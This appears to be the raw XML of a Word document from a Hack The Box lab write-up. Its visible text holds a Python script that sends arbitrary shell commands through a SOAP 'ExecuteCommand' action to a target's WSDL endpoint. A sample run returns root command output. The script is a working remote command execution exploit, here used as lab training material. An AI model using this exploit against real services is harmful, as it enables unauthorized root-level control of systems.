          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while True:</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd = input("$ ")</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    payload = f'&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"&gt;&lt;soap:Body&gt;&lt;LoginRequest xmlns="http://tempuri.org/"&gt;&lt;cmd&gt;{cmd}&lt;/cmd&gt;&lt;/LoginRequest&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;'</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(requests.post("http://&lt;TARGET IP&gt;:3002/wsdl", data=payload, headers={"SOAPAction":'"ExecuteCommand"'}).content)</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838411D" w14:textId="0D1D6B30" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can execute it as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC08235" w14:textId="4262261C" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="00552567">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yovecio@htb[/htb]$ python3 automate.py</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ id</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b'&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"&gt;&lt;soap:Body&gt;&lt;LoginResponse xmlns="http://tempuri.org/"&gt;&lt;success&gt;true&lt;/success&gt;&lt;result&gt;uid=0(root) gid=0(root) groups=0(root)\n&lt;/result&gt;&lt;/LoginResponse&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;'</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F375C0" w:rsidRPr="005525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546C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D5E9348"/>
    <w:lvl w:ilvl="0" w:tplc="DCF2ADF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5AC84664">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D524754E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CED2C41E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="627483B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FCBC533C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="951E49A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D3807154">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="409C2268">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="211381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94D42"/>
    <w:rsid w:val="00552567"/>
    <w:rsid w:val="00F375C0"/>
    <w:rsid w:val="4299D736"/>
    <w:rsid w:val="77994D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4D42"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB8BFD67-124C-424A-876B-B6227E25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1516</Words>
  <Characters>8647</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>72</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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2023-12-14T09:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-03T09:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>